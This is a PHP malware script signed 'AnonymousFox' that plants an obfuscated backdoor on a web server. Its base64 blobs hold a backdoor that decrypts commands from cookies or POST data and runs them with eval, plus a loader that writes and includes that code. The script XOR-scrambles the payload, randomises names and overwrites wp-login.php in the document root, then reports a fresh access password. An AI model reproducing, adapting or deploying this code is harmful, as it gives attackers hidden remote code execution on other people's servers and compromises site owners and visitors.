Hacked By AnonymousFox
<?php
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
function generateRandomStringEval($length = 12)
{
$characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString ;
}
function generateRndString($length = 10)
{
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString ;
}
function generateRandomString($length = 10)
{
$characters = '0123456789abcdefghijklmnopqrstuvwxyz';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString . ".php";
}
function _add_action($snippet, $template, $xor_number)
{
$splitted = str_split($snippet);
$action = "";
for ($i = 0; $i < strlen($snippet);$i++) {
$action .= $splitted[$i] ^ $template[$i%$xor_number];
}
$action = urlencode($action);
return $action;
}
function GetDocRoot()
{
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
if ($docroot_end === FALSE)
{
return $_SERVER['DOCUMENT_ROOT'];
}
elseif ($docroot_end === 0)
{
return "/";
}
else
{
return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
}
$origin_backdoor = base64_decode("PD9waHANCkBpbmlfc2V0KCdlcnJvcl9sb2cnLCBOVUxMKTsNCkBpbmlfc2V0KCdsb2dfZXJyb3JzJywgMCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQoNCg0KZnVuY3Rpb24gc2hkcCgkZGF0YSwgJGtleSkNCnsNCiAgICAkb3V0X2RhdGEgPSAiIjsNCiAgICBmb3IgKCRpID0gMDsgJGkgPCBzdHJsZW4oJGRhdGEpOykgew0KICAgICAgICBmb3IgKCRqID0gMDsgJGogPCBzdHJsZW4oJGtleSkgJiYgJGkgPCBzdHJsZW4oJGRhdGEpOyAkaisrLCAkaSsrKSB7DQogICAgICAgICAgICAkb3V0X2RhdGEgLj0gY2hyKG9yZCgkZGF0YVskaV0pIF4gb3JkKCRrZXlbJGpdKSk7DQogICAgICAgIH0NCiAgICB9DQogICAgcmV0dXJuICRvdXRfZGF0YTsNCn0NCmlmIChpc3NldCgkX0dFVFs2NzM0MzVdKSkNCnsNCiAgICBkaWUobWQ1KDQ3NzEyKSk7DQp9DQokdGVtcD1hcnJheV9tZXJnZSgkX0NPT0tJRSwgJF9QT1NUKTsNCmZvcmVhY2ggKCR0ZW1wIGFzICRkYXRhX2tleSA9PiAkZGF0YSkgew0KICAgICRkYXRhID0gQHVuc2VyaWFsaXplKHNoZHAoc2hkcChiYXNlNjRfZGVjb2RlKCRkYXRhKSwgJzRlZjYzYWJlLTFhYmQtNDVhNi05MTNkLTZmYjk5NjU3ZTI0YicpLCAkZGF0YV9rZXkpKTsNCiAgICBpZiAoaXNzZXQoJGRhdGFbJ2FrJ10pKSB7DQogICAgICAgIGlmICgkZGF0YVsnYSddID09ICdpJykgew0KICAgICAgICAgICAgJGkgPSBhcnJheSgNCiAgICAgICAgICAgICAgICAncHYnID0+IEBwaHB2ZXJzaW9uKCksDQogICAgICAgICAgICAgICAgJ3N2JyA9PiAnMS4wLTEnLA0KICAgICAgICAgICAgKTsNCiAgICAgICAgICAgIGVjaG8gQHNlcmlhbGl6ZSgkaSk7DQogICAgICAgIH0gZWxzZWlmICgkZGF0YVsnYSddID09ICdlJykgew0KICAgICAgICAgICAgZXZhbCgkZGF0YVsnZCddKTsNCiAgICAgICAgfQ0KICAgICAgICBleGl0KCk7DQogICAgfQ0KfQ==");
$new_pass = generateRndString(35);
$origin_backdoor = str_replace("4ef63abe-1abd-45a6-913d-6fb99657e24b",$new_pass,$origin_backdoor );
$evaluaor = base64_decode("PD9waHANCg0KZnVuY3Rpb24gX3JlbW92ZV9hY3Rpb24oJHNuaXBwZXQsICR0ZW1wbGF0ZSkNCnsNCiAgICAkc25pcHBldCA9IHVybGRlY29kZSgkc25pcHBldCk7DQogICAgJHNwbGl0dGVkID0gc3RyX3NwbGl0KCRzbmlwcGV0KTsNCiAgICAkYWN0aW9uID0gIiI7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgc3RybGVuKCRzbmlwcGV0KTskaSsrKSB7DQogICAgICAgICRhY3Rpb24gLj0gJHNwbGl0dGVkWyRpXSBeICR0ZW1wbGF0ZVskaSV4b3JfbnVtYmVyXTsNCiAgICB9DQogICAgcmV0dXJuICRhY3Rpb247DQp9DQoNCiRpPSIjVVJMRU5DT0RFRF9DT0RFIyI7DQokaj0iI1VSTEVOQ09ERURfZmlsZV9wdXRfY29udGV0bnRzIyI7DQoNCiRpbmRleD0iI1hPUktFWSMiOw0KDQokayA9IF9yZW1vdmVfYWN0aW9uKCRpLCAkaW5kZXgpOw0KJGYgPSBfcmVtb3ZlX2FjdGlvbigkaiwgJGluZGV4KTsNCiRmKCRpbmRleCwgJGspOw0KaW5jbHVkZV9vbmNlICgkaW5kZXgpOw0KdW5saW5rKCRpbmRleCk7DQpleGl0KCk7");
$xor_number=rand(3,12);
$XORKEY = generateRandomStringEval(12);
$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number);
$URLENCODED_CODE_file_put_contents = _add_action("file_put_contents", $XORKEY, $xor_number);
$snippet_varname = generateRandomStringEval(rand(6,12));
$template_varname = generateRandomStringEval(rand(6,12));
$splitted_varname = generateRandomStringEval(rand(6,12));
$_remove_action_varname = generateRandomStringEval(rand(6,12));
$index_varname = generateRandomStringEval(rand(6,12));
$evaluaor=str_replace('$splitted', "$".$splitted_varname, $evaluaor);
$evaluaor=str_replace('xor_number', $xor_number, $evaluaor);
$evaluaor=str_replace('$index', "$".$index_varname, $evaluaor);
$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor);
$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor);
$evaluaor=str_replace('$template', "$".$template_varname, $evaluaor);
$evaluaor=str_replace('$snippet', "$".$snippet_varname, $evaluaor);
$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor);
$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor);
srand(time());
if (!function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (!$f) {
return false;
} else {
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
////////////////////////////////////////////////////////////////////////////////////////////
$filename = "readurl.php";
# $filename = generateRandomString();
#$filename = "options-reading.php";
#$filename = "wp-login.php";
$filename = "wp-login.php";
# get base local and remote path
$base_www_path = $host = @$_SERVER['HTTP_HOST'];
$base_local_path = GetDocRoot();
$full_payload_name = GetDocRoot() . "/$filename";
$good = FALSE;
if (file_put_contents($full_payload_name, $payload_file))
{
echo "UROK#http://" . $filename. "#ONDOK#". $new_pass . "#ENDP" . PHP_EOL;
$good=TRUE;
$good_counter++;
exit();
}
if(!$good)
echo "URL#STATUS_CANTUPLOAD#CCCURL";
echo "#CCCURL";
//unlink("dfaonfpfkwg.php");
exit();
Hacked By AnonymousFox1.0, Coded By AnonymousFox